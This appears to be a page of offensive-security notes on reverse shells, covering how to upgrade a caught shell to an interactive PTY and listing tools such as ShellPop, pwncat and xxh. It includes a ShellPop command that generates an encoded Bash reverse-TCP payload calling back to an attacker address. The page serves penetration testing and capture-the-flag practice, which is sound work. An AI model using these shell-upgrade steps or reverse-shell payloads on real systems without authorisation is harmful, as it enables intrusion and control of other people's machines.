Shells

Upgrade to PTY
​https://forum.hackthebox.eu/discussion/comment/22312#Comment_22312​
​https://xakep.ru/2019/07/16/mischief/#toc05.1​
​https://securixy.kz/hack-faq/apgrejd-reverse-shell-do-interaktivnogo-tty.html/​
​https://infosecwriteups.com/using-tmux-for-automating-interactive-reverse-shells-630260740af3​
 # Spawn PTY
$ if python3 -V > /dev/null 2>&1; then
  python3 -c 'import pty; pty.spawn("/bin/bash")'
elif python -V > /dev/null 2>&1; then
  python -c 'import pty; pty.spawn("/bin/bash")'
fi
Or
$ script -q /dev/null /bin/bash
​
 # Background remote shell
[email protected]:~$ ^Z
​
 # Get rows and cols from local terminal
[email protected]:~$ stty -a | head -n1 | cut -d ';' -f 2-3 | cut -b2- | sed 's/; /\n/'
​
 # Disable local output in terminal
[email protected]:~$ stty raw -echo; fg
​
 # (optional) Reset remote terminal
[email protected]:~$ reset
​
 # Set rows and columns for proper text aligning
[email protected]:~$ stty rows ${ROWS} cols ${COLS}
​
 # For CTRL-L to work
[email protected]:~$ export TERM=xterm / xterm-color / xterm-256color
​
 # (optional) Get Bash new process image
[email protected]:~$ exec /bin/bash [-l]
Tools
​http://www.jackson-t.ca/runtime-exec-payloads.html​
ShellPop
​https://github.com/0x00-0x00/ShellPop​
Bash reverse TCP example:
$ shellpop -H 10.10.13.37 -P 9001 --reverse --number 8 --base64
pwncat
​https://securixy.kz/hack-faq/pwncat-netcat-na-steroidah.html/​
​https://github.com/cytopia/pwncat​
xxh
​https://github.com/xxh/xxh​
$ pipx install xxh-xxh
$ source xxh.zsh -i id_rsa [email protected] +I xxh-plugin-zsh-ohmyzsh +if [+q/+vv]
$ ssh -i id_cthulhu [email protected] -f "rm -rf .xxh"
Last modified 1yr ago